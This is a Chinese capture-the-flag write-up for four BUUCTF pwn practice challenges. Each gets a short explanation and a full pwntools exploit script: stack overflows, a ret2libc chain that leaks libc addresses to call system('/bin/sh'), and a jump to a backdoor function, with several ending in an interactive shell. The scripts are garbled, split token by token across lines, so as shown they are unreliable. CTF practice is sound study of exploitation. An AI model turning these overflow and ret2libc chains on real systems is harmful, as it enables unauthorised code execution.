生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-BUUCTF-3
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
PWN-PRACTICE-BUUCTF-3
- [OGeek2019]babyrop
- ciscn_2019_n_8
- get_started_3dsctf_2016
- jarvisoj_level2
[OGeek2019]babyrop
簡單的ret2libc,構(gòu)造rop
main函數(shù)中讀取一個(gè)隨機(jī)數(shù)到buf中,傳入sub_804871F
用"\x00"來繞過strlen和strncmp,buf[7]作為返回值
傳入sub_804871F返回的buf[7]作為要讀取的長度,設(shè)置為255,構(gòu)成棧溢出
最后是ret2libc腳本,一開始用io.sendline()不行,它會自動加一個(gè)"\n",在將緩沖區(qū)填充滿的情況下又加了一個(gè)"\n",導(dǎo)致打印不出write_addr,換成io.send()就可以了,它不會自動加"\n"
from pwn
import *
io
=remote
('node4.buuoj.cn',29571)
elf
=ELF
('./pwn')
libc
=ELF
('./libc-2.23-16-x32.so')
payload
="\x00"+"a"*6+p8
(255)+"b"*24
io
.send
(payload
)
io
.recvuntil
('Correct\n')
write_got
=elf
.got
['write']
write_plt
=elf
.plt
['write']
main_addr
=0x08048825
payload
="a"*(231+4)+p32
(write_plt
)+p32
(main_addr
)+p32
(1)+p32
(write_got
)+p32
(4)
io
.send
(payload
)
write_addr
=u32
(io
.recv
(4))
print(hex(write_addr
))
libc_base
=write_addr
-libc
.sym
['write']
system
=libc_base
+libc
.sym
['system']
binsh
=libc_base
+libc
.search
("/bin/sh").next()
payload
="\x00"+"a"*6+p8
(255)+"b"*24
io
.send
(payload
)
io
.recvuntil
('Correct\n')
payload
="a"*(231+4)+p32
(system
)+p32
(0xdeadbeef)+p32
(binsh
)
io
.send
(payload
)
io
.sendline
("cat flag")
io
.interactive
()
ciscn_2019_n_8
main函數(shù)中,驗(yàn)證var[13]==0x11是否成立
可以知道var中數(shù)組元素都是_DWORD類型的,即雙字,四字節(jié),32位
在第13行的if語句中,從var[13]的起始地址開始,讀取了一個(gè)_QWORD類型的數(shù)字,即四字,八字節(jié),64位
于是可以構(gòu)造輸入為,前13個(gè)為32位的數(shù)字,后接一個(gè)64位的0x11,即可驗(yàn)證通過,執(zhí)行系統(tǒng)調(diào)用
from pwn
import *
io
=remote
('node4.buuoj.cn',28433)
io
.recvuntil
("What's your name?\n")
payload
=p32
(0)*13+p64
(0x11)
io
.sendline
(payload
)
io
.sendline
("cat flag")
io
.interactive
()
get_started_3dsctf_2016
靜態(tài)編譯的elf
main函數(shù)中存在棧溢出,覆蓋eip到后門函數(shù)get_flag
構(gòu)造payload的時(shí)候,發(fā)現(xiàn)main函數(shù)是用esp尋址的,不用覆蓋ebp,填充完緩沖區(qū)后直接覆蓋eip
后面的返回地址不能隨便填,找到一個(gè)exit函數(shù),填exit的地址
最后再帶上get_flag函數(shù)中要驗(yàn)證的兩個(gè)參數(shù)
from pwn
import *
io
=remote
('node4.buuoj.cn',28168)
get_flag
=0x080489A0
exit
=0x0804E6A0
payload
="a"*56+p32
(get_flag
)+p32
(exit
)+p32
(0x308CD64F)+p32
(0x195719D1)
io
.sendline
(payload
)
io
.interactive
()
jarvisoj_level2
簡單的棧溢出,ret2syscall
可執(zhí)行文件留有system,還給了hint,即"/bin/sh"
利用棧溢出,覆蓋eip到system,帶上參數(shù)hint,即可getshell
from pwn
import *
io
=remote
('node4.buuoj.cn',26226)
elf
=ELF
('./level2')
io
.recvuntil
("Input:\n")
hint
=elf
.sym
['hint']
system
=elf
.plt
['system']
main_addr
=0x08048480
payload
="a"*(136+4)+p32
(system
)+p32
(main_addr
)+p32
(hint
)
io
.sendline
(payload
)
io
.sendline
("cat flag")
io
.interactive
()
總結(jié)
以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-3的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。
